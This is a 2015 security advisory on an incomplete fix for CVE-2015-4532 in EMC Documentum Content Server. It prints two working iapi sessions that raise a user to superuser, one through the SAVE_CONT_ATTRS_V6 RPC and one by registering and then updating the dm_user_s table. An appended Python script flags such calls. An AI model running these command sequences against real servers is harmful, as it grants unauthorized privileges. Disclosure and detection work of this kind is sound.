SECURITYVULNS:DOC:32402
Aug 24, 2015

Privilege escalation through RPC commands in EMC Documentum Content Server (incomplete fix in CVE-2015-4532)


Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

For a detailed description see the attached VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt; for the vendor announcement see CVE-2015-4532 in http://seclists.org/bugtraq/2015/Aug/86. The problem is that the PoC code provided in VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt misses two obvious points:

  1. Content Server supports about 400 undocumented RPC commands, but the PoC code covers only 33 of them. For example, all versions of EMC Documentum Content Server support the SAVE_CONT_ATTRS_V6 RPC command, which has the same behaviour as SAVE_CONT_ATTRS from VRF#HUFG9EBA.txt and hence is vulnerable:

API> retrieve,c,dm_user where user_name=USER

11024be980000900
API> get,c,l,user_privileges

0
API> get,c,l,i_vstamp

1
API> apply,c,11024be980000900,SAVE_CONT_ATTRS_V6,
OBJECT_TYPE,S,dm_user,IS_NEW_OBJECT,B,F,
i_vstamp,I,1,user_privileges,I,16

q0
API> ?,c,q0
RESULT

      1

API> revert,c,l,

OK
API> get,c,l,user_privileges

16

  2. Creating a malicious user with superuser privileges or a malicious docbase method is not the only option to escalate privileges. Demonstration:


-- acquiring r_object_id for brand new
-- dm_registered object

API> apply,c,NEXT_ID_LIST,TAG,I,25,HOW_MANY,I,1

q0
API> ?,c,q0
next_id

19024be98001fd0b
(1 row affected)


-- Creating brand new dm_registered object

API> apply,c,19024be98001fd0b,SysObjSave,
OBJECT_TYPE,S,dm_registered,
IS_NEW_OBJECT,B,T,
i_vstamp,I,0,
table_name,S,dm_user_s,
table_owner,S,repo,
owner_name,S,repo,
world_permit,I,7,
object_name,S,dm_user_s,
owner_table_permit,I,15,
group_table_permit,I,15,
world_table_permit,I,15,
r_object_type,S,dm_registered

q0
API> ?,c,q0
result

      1

(1 row affected)


-- Now attacker is able to modify database tables

API> ?,c,select count(*) from dm_dbo.dm_user_s
count(*)

             7930

(1 row affected)

API> ?,c,update dm_dbo.dm_user_s set user_privileges=16
where user_name=USER
rows_updated

      1

(1 row affected)

API> ?,c,select user_privileges from dm_dbo.dm_user_s
where user_name=USER
user_privileges

        16

(1 row affected)

__
Regards,
Andrey B. Panfilov
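
Added example, not part of the original advisory or of any vendor code: a Python reviewer for an iapi-style command transcript in the apply syntax shown above. It flags calls by the attributes they set rather than by RPC name, since the advisory's point is that name-based coverage misses siblings such as SAVE_CONT_ATTRS_V6. Where the transcript comes from, the rule set and the sample object ids are assumptions.

```python
import re

# Assumed rule set: flag by the attribute being set, never by RPC name.
PRIV_ATTRS = {"user_privileges"}
TABLE_PERMITS = {"owner_table_permit", "group_table_permit", "world_table_permit"}
OBJ_ID = re.compile(r"^(?:[0-9a-fA-F]{16}|NULL)$")

def commands(transcript):
    """Return API> commands, joining lines while a command ends with a comma."""
    cmds, joining = [], False
    for line in map(str.strip, transcript.splitlines()):
        if line.startswith("API>"):
            cmds.append(line[4:].strip())
        elif joining and line:
            cmds[-1] += line
        joining = bool(cmds) and cmds[-1].endswith(",") and bool(line)
    return cmds

def parse_apply(command):
    """Split 'apply,c,[id,]RPC,name,type,value,...' into (rpc, args)."""
    fields = [f.strip() for f in command.rstrip(", ").split(",")]
    if len(fields) < 3 or fields[0].lower() != "apply":
        return None
    # The object id is optional: the NEXT_ID_LIST call above has none.
    rest = fields[3:] if OBJ_ID.match(fields[2]) else fields[2:]
    if not rest:
        return None
    args = {rest[i]: rest[i + 2] for i in range(1, len(rest) - 2, 3)}
    return rest[0], args

def review(transcript):
    """Return (rpc, reason) for apply calls that change privileges or table access."""
    findings = []
    for rpc, args in filter(None, map(parse_apply, commands(transcript))):
        if args.keys() & PRIV_ATTRS:
            findings.append((rpc, "sets user_privileges=" + args["user_privileges"]))
        if args.get("OBJECT_TYPE") == "dm_registered" and args.keys() & TABLE_PERMITS:
            findings.append((rpc, "registers table " + args.get("table_name", "?")))
    return findings

# Constructed transcript modelled on the sessions above (object ids are made up).
SAMPLE = """API> apply,c,1100000000000001,SAVE_CONT_ATTRS_V6,
OBJECT_TYPE,S,dm_user,i_vstamp,I,1,user_privileges,I,16

q0
API> apply,c,NEXT_ID_LIST,TAG,I,25,HOW_MANY,I,1
API> apply,c,1900000000000002,SysObjSave,OBJECT_TYPE,S,dm_registered,
table_name,S,dm_user_s,world_table_permit,I,15
API> get,c,l,user_privileges
"""
print(review(SAMPLE))
```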
